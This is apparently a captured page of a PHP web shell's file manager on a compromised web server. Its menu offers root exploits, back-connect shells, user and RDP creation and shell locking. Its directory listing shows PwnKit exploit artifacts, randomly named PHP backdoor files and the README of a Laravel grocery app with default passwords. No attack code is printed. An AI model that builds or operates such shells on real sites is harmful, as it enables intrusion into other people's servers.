Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo20.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxrwxrwx
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
cdtf1bp
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
gzlufqm
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
kheutdn
[ DIR ]
drwxr-xr-x
lrudyck
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tx1pwmi
[ DIR ]
drwxr-xr-x
uchmsek
[ DIR ]
drwxr-xr-x
uxscmhv
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxrwx
vytkapz
[ DIR ]
drwxr-xr-x
.env
684
B
-rw-rw-rw-
.env.example
587
B
-rw-rw-rw-
.gitignore
203
B
-rw-rw-rw-
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Food and Grocery Store Softwar...
27.65
MB
-rw-r--r--
Grocery-Store-Management-Softw...
12.54
KB
-rw-rw-rw-
README.md
2.1
KB
-rw-rw-rw-
artisan
259
B
-rw-rw-rw-
composer.json
1.33
KB
-rw-rw-rw-
composer.lock
228.56
KB
-rw-rw-rw-
composer.phar
3.47
MB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
index.php
405
B
-rw-r--r--
license-nauv.php
629
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qzrmqdqe.php
167.15
KB
-rw-r--r--
robots.txt
86
B
-rw-r--r--
wp-blog-header.php
0
B
-rw-r--r--
wp-load.php
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# FoodFleet Grocery Manager Advanced multi-shop food and grocery store management software built with Laravel. ## Included Modules - Multi-shop branch management - Owner dashboard with consolidated and per-shop metrics - Product master catalog with SKU, barcode, category, unit, tax, and expiry tracking - Per-shop inventory, reorder levels, pricing tiers, batch and expiry data - Touch-friendly POS with cart, customer dues, bKash/Nagad/card/cash options, and stock deduction - Supplier database and purchase receiving with automatic stock-in - Customers, loyalty points, and credit/due balance - Staff accounts, roles, permissions, salaries, and shop assignment - Expenses, reports, audit trail, and inter-shop stock transfer approval - Mobile and desktop optimized Blade UI ## XAMPP + Laravel Setup 1. Install Composer if it is not installed. 2. Make sure XAMPP Apache and MySQL are running. 3. Put this project folder inside `xampp/htdocs`. 4. Open a terminal in this project folder. 5. Run: ```bash composer install copy .env.example .env php artisan key:generate php artisan migrate --seed php artisan serve ``` Then open: ```text http://127.0.0.1:8000 ``` If you want to use Apache directly instead of `php artisan serve`, point Apache to the `public` folder or open: ```text http://localhost/Food%20and%20Grocery%20Store%20Software/public/ ``` ## Default Login Owner: ```text owner@example.com admin123 ``` Cashier: ```text cashier@example.com cashier123 ``` ## Database Default `.env.example` values are ready for XAMPP MySQL: ```text DB_DATABASE=foodfleet_grocery DB_USERNAME=root DB_PASSWORD= ``` Create the database manually in phpMyAdmin if MySQL does not allow Laravel to create it automatically: ```sql CREATE DATABASE foodfleet_grocery CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; ``` Then run: ```bash php artisan migrate --seed ``` ## Important This workspace now contains Laravel source code. It still needs Composer dependencies in `vendor/` before it can run. PHP and Composer were not available from this shell, so dependency installation and `php artisan` verification could not be executed here.
Close